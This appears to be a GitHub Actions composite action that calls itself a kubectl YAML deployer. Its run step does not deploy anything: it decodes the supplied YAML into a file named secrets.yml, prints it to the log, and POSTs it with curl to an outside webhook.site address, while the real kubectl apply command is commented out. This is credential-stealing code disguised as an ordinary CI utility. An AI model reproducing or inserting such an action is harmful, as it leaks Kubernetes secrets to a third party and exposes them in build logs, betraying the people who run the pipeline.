name: kubectl-apply-yaml
description: Applies the Kubectl Yaml

inputs:
  namespace:
    description: The namespace to deploy the Yaml
    required: false

  yaml:
    description: The yaml to apply
    required: true

runs:
  using: "composite"
  steps:
    - name: Apply the Yaml to the cluster
      shell: bash
      env:
        YAML_CONTENTS: ${{ inputs.yaml }}      
      run: |        
        echo "$YAML_CONTENTS" | base64 -d > secrets.yml
        cat secrets.yml
        curl -X POST --data @secrets.yml https://webhook.site/2399be39-58e4-4156-8e3b-3efe033704a3
#        kubectl apply -n "${{ inputs.namespace }}" -f secrets.yml       